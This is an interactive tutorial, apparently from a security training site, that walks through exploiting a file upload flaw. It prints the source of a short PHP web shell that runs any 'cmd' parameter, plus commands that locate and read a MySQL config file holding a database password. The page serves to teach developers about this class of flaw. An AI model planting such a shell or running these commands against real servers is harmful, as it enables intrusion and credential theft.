File Upload Vulnerabilities
Back to All Lessons
Mal is a hacker that has signed up for a website running on a popular content management system.
He has noticed a couple of things about the site's profile image upload function.
Firstly, uploaded files do not get renamed as part of the upload process. The file name appears in the URL of the profile image when it is published.
Secondly, file-type checking is done in JavaScript.
Mal writes a simple script called hack.php. When this web shell is executed by PHP, it will run any command passed in the "cmd" parameter.
He disables JavaScript in his browser, and uploads hack.php as his profile image. Since JavaScript is disabled, the file type is not checked.
Unsurprisingly, his profile looks broken - the file he uploaded is not a valid image. However, the script now lives on the server.
Dropping the URL of the "profile image" in the browser address bar causes the script to be executed.
In fact, any command passed in the "cmd" parameter will get executed on the server. His upload has created a command execution vulnerability.
Help Mal get access to sensitive data on the server. Pass in the locate my.cnf command to find a database config file.
Good job! Now invoke the cat /etc/mysql/my.cnf command to read the file and discover the database password.
Mal cdb38ecff0dc0585f07a80c2b779bf872ccc7f66ad857f8e9bdd92a1bb433ce8
What fun I will have in my basement today!
I feel a hack approaching.
Oooh, it's getting real close.
EAT MY HACK, mwah ha ha.
I AM GREATLY PLEASED.
There it is!
File chooser 49ea1a29e5a72b8d95b3f7f8f6ef25d77530e1e16414d58145f62633e23105dc
YOUR PROFILE
UPLOADING...
Anon e4b79a68893ecc7311ea33d3b6a8d469c23abb237b19ef8012924cc9aa74f97a
  USERNAME Edit 350cb607de8069eb2d9aa432bbd7e770c4b8736db1121b01bdff383df2b0d953
Mal
File chooser 49ea1a29e5a72b8d95b3f7f8f6ef25d77530e1e16414d58145f62633e23105dc
YOUR PROFILE
UPLOADING...
Anon e4b79a68893ecc7311ea33d3b6a8d469c23abb237b19ef8012924cc9aa74f97a
  USERNAME Edit 350cb607de8069eb2d9aa432bbd7e770c4b8736db1121b01bdff383df2b0d953
Mal
<?php
  if(isset($_REQUEST['cmd'])) {
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
  } else {
    echo "What is your bidding?";
  }
?>Danger 32a5a5ab5783f186c4c487f4dc78509e9f3fd654a4ab5387b489881bb5694390
A simple web shell, which when executed by PHP, will run any command passed in the "cmd" parameter.
File chooser 49ea1a29e5a72b8d95b3f7f8f6ef25d77530e1e16414d58145f62633e23105dc
YOUR PROFILE
UPLOADING...
Anon e4b79a68893ecc7311ea33d3b6a8d469c23abb237b19ef8012924cc9aa74f97a
  USERNAME Edit 350cb607de8069eb2d9aa432bbd7e770c4b8736db1121b01bdff383df2b0d953
Mal
File chooser 49ea1a29e5a72b8d95b3f7f8f6ef25d77530e1e16414d58145f62633e23105dc
YOUR PROFILE
UPLOADING...
Broken 7108c6dca5695e693a99640a7260615403533bb14336cde1f53d5a8557e4c387
  USERNAME Edit 350cb607de8069eb2d9aa432bbd7e770c4b8736db1121b01bdff383df2b0d953
Mal
What is your bidding?
Is your file upload function safe?
Netsparker n 834848961a0bf6ec5556448ff47f421d0b1204a572877a59717064b1088e8c43
Check today. Scan your website for File Upload Vulnerabilities and other vulnerabilities with